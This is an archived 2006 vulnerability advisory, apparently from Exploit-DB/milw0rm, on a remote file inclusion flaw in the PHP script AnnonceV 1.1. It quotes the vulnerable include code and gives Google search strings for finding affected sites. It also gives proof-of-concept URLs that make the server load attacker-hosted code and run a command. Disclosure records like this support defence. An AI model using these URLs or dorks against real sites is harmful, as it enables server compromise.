Kurdish Security Advisory

vendor:

AnnonceV1.1

by:

botan@linuxmail.org and irc.gigachat.net #kurdhack

7,5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: AnnonceV1.1

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: Yes

Related CWE: None

CPE: None

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

AnnonceV1.1 is vulnerable to Remote Code Execution. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The attacker can inject malicious code in the 'page' parameter of the vulnerable script. The malicious code will be executed on the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of AnnonceV1.1.

Source

Exploit-DB raw data:

* Kurdish Security Advisory
* Original Adv : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html
* Script : AnnonceV
* Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html
* Version : 1.1
* Risk : High
* Class : Remote
* Contact : botan@linuxmail.org and irc.gigachat.net #kurdhack
* Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and other my friends
-----------------------------------------------------------------------------------

Google w0rkez :P : "AnnonceV1.1"
: "/admin/annonce.php"
: "/annonce.php"

lol now code :]

$page=$_GET['page'];


if(substr($page, -3) == 'txt')//pour les news
{
include("newsdisplay.php");
}

else //pour toutes les autres pages
{
include($page.".php");
}

?>

http://www.site.com/annonce.php?page=yourcode.txt?&cmd=id
http://www.site.com/admin/annonce.php?page=yourcode.txt?&cmd=id

# milw0rm.com [2006-09-05]